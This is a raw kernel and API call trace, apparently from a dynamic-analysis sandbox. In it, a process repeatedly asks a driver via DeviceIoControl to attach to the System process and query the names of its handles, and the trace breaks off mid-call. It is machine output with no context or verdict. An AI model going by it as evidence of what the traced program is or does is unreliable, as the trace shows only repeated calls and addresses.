DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0118.443] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.443] PsAcquireProcessExitSynchronization () returned 0x0 [0118.443] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.443] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a1df20, HandleInformation=0x0) returned 0x0 [0118.443] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.443] PsReleaseProcessExitSynchronization () returned 0x2 [0118.443] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.443] ObQueryNameString (in: Object=0xfffffa8003a1df20, ObjectNameInfo=0xfffffa800284e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.443] ObfDereferenceObject (Object=0xfffffa8003a1df20) returned 0x2 [0118.443] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.444] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.444] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.444] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0118.444] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.444] PsAcquireProcessExitSynchronization () returned 0x0 [0118.444] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.444] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800e3fb5b0, HandleInformation=0x0) returned 0x0 [0118.444] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.444] PsReleaseProcessExitSynchronization () returned 0x2 [0118.444] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.444] ObQueryNameString (in: Object=0xfffffa800e3fb5b0, ObjectNameInfo=0xfffffa800284d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.444] ObfDereferenceObject (Object=0xfffffa800e3fb5b0) returned 0x2 [0118.444] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.444] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.444] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.444] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.444] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.444] PsAcquireProcessExitSynchronization () returned 0x0 [0118.444] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.444] ObReferenceObjectByHandle (in: Handle=0xffffffff800004ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800a8713a0, HandleInformation=0x0) returned 0x0 [0118.444] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.444] PsReleaseProcessExitSynchronization () returned 0x2 [0118.444] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.445] ObQueryNameString (in: Object=0xfffffa800a8713a0, ObjectNameInfo=0xfffffa800284c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.445] ObfDereferenceObject (Object=0xfffffa800a8713a0) returned 0x2 [0118.445] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.445] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.445] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.445] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.445] PsAcquireProcessExitSynchronization () returned 0x0 [0118.445] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.445] ObReferenceObjectByHandle (in: Handle=0xffffffff800004f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f7f980, HandleInformation=0x0) returned 0x0 [0118.445] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.445] PsReleaseProcessExitSynchronization () returned 0x2 [0118.445] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.445] ObQueryNameString (in: Object=0xfffffa8001f7f980, ObjectNameInfo=0xfffffa800286c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.445] ObfDereferenceObject (Object=0xfffffa8001f7f980) returned 0x2 [0118.445] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.445] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.445] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.445] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.445] PsAcquireProcessExitSynchronization () returned 0x0 [0118.445] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.446] ObReferenceObjectByHandle (in: Handle=0xffffffff800004fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a6aa10, HandleInformation=0x0) returned 0x0 [0118.446] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.446] PsReleaseProcessExitSynchronization () returned 0x2 [0118.446] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.446] ObQueryNameString (in: Object=0xfffffa8003a6aa10, ObjectNameInfo=0xfffffa800286d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.446] ObfDereferenceObject (Object=0xfffffa8003a6aa10) returned 0x2 [0118.446] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.446] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.446] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.446] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.446] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.446] PsAcquireProcessExitSynchronization () returned 0x0 [0118.446] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.446] ObReferenceObjectByHandle (in: Handle=0xffffffff80000500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8009bbc9d0, HandleInformation=0x0) returned 0x0 [0118.446] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.446] PsReleaseProcessExitSynchronization () returned 0x2 [0118.446] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.446] ObQueryNameString (in: Object=0xfffffa8009bbc9d0, ObjectNameInfo=0xfffffa800286e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.446] ObfDereferenceObject (Object=0xfffffa8009bbc9d0) returned 0x2 [0118.446] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.446] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.447] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.447] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.447] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.447] PsAcquireProcessExitSynchronization () returned 0x0 [0118.447] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.447] ObReferenceObjectByHandle (in: Handle=0xffffffff80000504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a75d50, HandleInformation=0x0) returned 0x0 [0118.447] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.447] PsReleaseProcessExitSynchronization () returned 0x2 [0118.447] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.447] ObQueryNameString (in: Object=0xfffffa8003a75d50, ObjectNameInfo=0xfffffa800286f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.447] ObfDereferenceObject (Object=0xfffffa8003a75d50) returned 0x2 [0118.447] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.447] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.447] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.447] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0118.447] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.447] PsAcquireProcessExitSynchronization () returned 0x0 [0118.447] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.447] ObReferenceObjectByHandle (in: Handle=0xffffffff80000508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800382e210, HandleInformation=0x0) returned 0x0 [0118.447] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.447] PsReleaseProcessExitSynchronization () returned 0x2 [0118.447] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.448] ObQueryNameString (in: Object=0xfffffa800382e210, ObjectNameInfo=0xfffffa800287b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.448] ObfDereferenceObject (Object=0xfffffa800382e210) returned 0x2 [0118.448] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.448] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.448] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.448] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.448] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.448] PsAcquireProcessExitSynchronization () returned 0x0 [0118.448] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.448] ObReferenceObjectByHandle (in: Handle=0xffffffff8000050c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a66850, HandleInformation=0x0) returned 0x0 [0118.448] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.448] PsReleaseProcessExitSynchronization () returned 0x2 [0118.448] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.448] ObQueryNameString (in: Object=0xfffffa8003a66850, ObjectNameInfo=0xfffffa800287c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.448] ObfDereferenceObject (Object=0xfffffa8003a66850) returned 0x2 [0118.448] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.448] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.448] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.449] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.449] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.449] PsAcquireProcessExitSynchronization () returned 0x0 [0118.449] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.449] ObReferenceObjectByHandle (in: Handle=0xffffffff80000510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003809d20, HandleInformation=0x0) returned 0x0 [0118.449] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.449] PsReleaseProcessExitSynchronization () returned 0x2 [0118.449] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.449] ObQueryNameString (in: Object=0xfffffa8003809d20, ObjectNameInfo=0xfffffa800287d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.449] ObfDereferenceObject (Object=0xfffffa8003809d20) returned 0x2 [0118.449] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.449] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.449] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.449] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.449] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.449] PsAcquireProcessExitSynchronization () returned 0x0 [0118.449] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.449] ObReferenceObjectByHandle (in: Handle=0xffffffff80000514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001967a30, HandleInformation=0x0) returned 0x0 [0118.449] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.449] PsReleaseProcessExitSynchronization () returned 0x2 [0118.449] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.449] ObQueryNameString (in: Object=0xfffffa8001967a30, ObjectNameInfo=0xfffffa800287f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.450] ObfDereferenceObject (Object=0xfffffa8001967a30) returned 0x2 [0118.450] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.450] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.450] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.450] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.450] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.450] PsAcquireProcessExitSynchronization () returned 0x0 [0118.450] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.450] ObReferenceObjectByHandle (in: Handle=0xffffffff80000518, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037ccbd0, HandleInformation=0x0) returned 0x0 [0118.450] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.450] PsReleaseProcessExitSynchronization () returned 0x2 [0118.450] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.450] ObQueryNameString (in: Object=0xfffffa80037ccbd0, ObjectNameInfo=0xfffffa8002880044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002880044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.450] ObfDereferenceObject (Object=0xfffffa80037ccbd0) returned 0x2 [0118.450] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.450] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.450] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.450] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.450] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.450] PsAcquireProcessExitSynchronization () returned 0x0 [0118.450] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.450] ObReferenceObjectByHandle (in: Handle=0xffffffff8000051c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002af6f20, HandleInformation=0x0) returned 0x0 [0118.451] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.451] PsReleaseProcessExitSynchronization () returned 0x2 [0118.451] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.451] ObQueryNameString (in: Object=0xfffffa8002af6f20, ObjectNameInfo=0xfffffa8002883044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002883044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.451] ObfDereferenceObject (Object=0xfffffa8002af6f20) returned 0x2 [0118.451] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.451] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.451] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.451] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.451] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.451] PsAcquireProcessExitSynchronization () returned 0x0 [0118.451] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.451] ObReferenceObjectByHandle (in: Handle=0xffffffff80000520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8c1f0, HandleInformation=0x0) returned 0x0 [0118.451] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.451] PsReleaseProcessExitSynchronization () returned 0x2 [0118.451] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.451] ObQueryNameString (in: Object=0xfffffa8001e8c1f0, ObjectNameInfo=0xfffffa8002884044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002884044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.451] ObfDereferenceObject (Object=0xfffffa8001e8c1f0) returned 0x2 [0118.451] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.452] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.452] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.452] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.452] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.452] PsAcquireProcessExitSynchronization () returned 0x0 [0118.452] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.452] ObReferenceObjectByHandle (in: Handle=0xffffffff80000524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a9d860, HandleInformation=0x0) returned 0x0 [0118.452] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.452] PsReleaseProcessExitSynchronization () returned 0x2 [0118.452] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.452] ObQueryNameString (in: Object=0xfffffa8003a9d860, ObjectNameInfo=0xfffffa8002885044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002885044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.452] ObfDereferenceObject (Object=0xfffffa8003a9d860) returned 0x2 [0118.452] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.452] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.452] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.452] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.452] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.452] PsAcquireProcessExitSynchronization () returned 0x0 [0118.452] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.452] ObReferenceObjectByHandle (in: Handle=0xffffffff80000528, DesiredAccess=0x0, ObjectType=0x0, 